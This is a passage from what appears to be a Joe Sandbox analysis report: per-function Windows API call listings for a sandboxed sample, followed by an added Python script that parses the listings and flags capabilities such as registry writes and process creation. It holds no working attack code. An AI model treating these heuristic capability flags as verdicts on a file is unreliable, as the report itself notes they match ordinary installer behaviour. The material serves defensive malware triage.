                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                          • CloseHandle.KERNEL32(?), ref: 004054F6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                          • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
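The per-function records above (dynamic import resolution via LoadLibraryExA/GetProcAddress at 00401FBB, a registry value write at 004023A2, a temp file created with the "nsa" prefix at 004059FF, and CreateProcessA next to the string "Error launching installer" at 004054E9) are the raw material an analyst works from, but the report lists them one function at a time. The script below is an added example and is not part of the Joe Sandbox report or of Joe Sandbox itself: it parses the listing format shown on this page into one record per function, including "Part of subcall function" lines, and flags capability clusters with rules that are this example's own (not Joe Sandbox signatures). The sample input is constructed from the records on this page. One caveat for triage: the strings "Error launching installer" and "[Rename]" and the "nsa" temp-file prefix are characteristic of the NSIS installer stub, so registry writes, temp files and child-process creation in these functions are expected installer behaviour; the flags are leads to review against the dumped payload, not verdicts.

```python
"""Group a Joe Sandbox per-function API listing into records and flag capability
clusters. Added example, not part of the report or of Joe Sandbox. Input format is
the one on this page: a record starts at "APIs"; direct calls read
"• Name.MODULE(args), ref: ADDR" (no "(args)" for zero-argument calls such as
GetTickCount); callee calls read "• Part of subcall function ADDR: Name.MODULE(...)";
"Strings" lists "• text, xrefs: ADDR"; "Similarity" carries the Opcode ID.
The capability rules below are this example's own, not Joe Sandbox signatures."""
import re
from dataclasses import dataclass, field

HEX8 = r"[0-9A-Fa-f]{8}"
CALL = rf"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>{HEX8})$"
API_RE = re.compile(r"^•\s+" + CALL)
SUBCALL_RE = re.compile(rf"^•\s+Part of subcall function (?P<callee>{HEX8}):\s+" + CALL)
STRING_RE = re.compile(rf"^•\s+(?P<text>.*),\s+xrefs:\s+(?P<ref>{HEX8})$")
OPCODE_RE = re.compile(r"^•\s+Opcode ID:\s+(?P<id>[0-9a-f]{64})$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (name, module, args, call site)
    subcalls: list = field(default_factory=list)  # (callee, name, module, args, call site)
    strings: list = field(default_factory=list)   # (text, xref)
    opcode_id: str = ""

    def api_names(self):
        """Direct plus callee API names, so a thin wrapper around a callee still matches."""
        return {a[0] for a in self.apis} | {s[1] for s in self.subcalls}

def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                       # the report indents sub-call lines
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":                   # every record opens with its API list
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:                      # text before the first complete record
            continue
        if section == "APIs":
            if m := SUBCALL_RE.match(line):
                current.subcalls.append((m["callee"], m["name"], m["module"], m["args"] or "", m["ref"]))
            elif m := API_RE.match(line):
                current.apis.append((m["name"], m["module"], m["args"] or "", m["ref"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            current.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := OPCODE_RE.match(line)):
            current.opcode_id = m["id"]
    return records

# Every API in a rule's set must be present (directly or through a callee) to fire.
CAPABILITY_RULES = {
    "dynamic_api_resolution": {"LoadLibraryExA", "GetProcAddress"},
    "registry_value_write": {"RegSetValueExA"},
    "child_process_creation": {"CreateProcessA"},
    "temp_file_staging": {"GetTempFileNameA"},
}

def classify(record):
    names = record.api_names()
    return sorted(cap for cap, needed in CAPABILITY_RULES.items() if needed <= names)

def triage(text):
    """Map the call site of each record's first direct API call to its capabilities."""
    return {r.apis[0][3]: classify(r) for r in parse_records(text) if r.apis}

# Constructed input: four records in the page's format, values copied from this page.
SAMPLE_REPORT = """
APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,?,759223A0), ref: 00404F81
• LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
Similarity
• Opcode ID: 500f6e3a65a5d06cc6fd84bae173ca6585055f773e93e28952c5af94c5a9b7f5
APIs
• RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
• RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000), ref: 004023FB
• RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000), ref: 004024D8
APIs
• GetTickCount.KERNEL32 ref: 004059E5
• GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059FF
Strings
APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
• CloseHandle.KERNEL32(?), ref: 004054F6
Strings
• Error launching installer, xrefs: 004054D3
"""

if __name__ == "__main__":
    for ref, caps in triage(SAMPLE_REPORT).items():
        print(ref, ", ".join(caps) or "-")
```

Run against a saved copy of the report's function listing, the output keys every flagged function by its first call site so it can be found again in the dump (the records are keyed that way because the Opcode ID is not present for every record on the page). Callee APIs are folded into the match so a function that only wraps the registry-writing callee still fires; tighten `CAPABILITY_RULES` to direct calls only if that produces too many hits on a large listing.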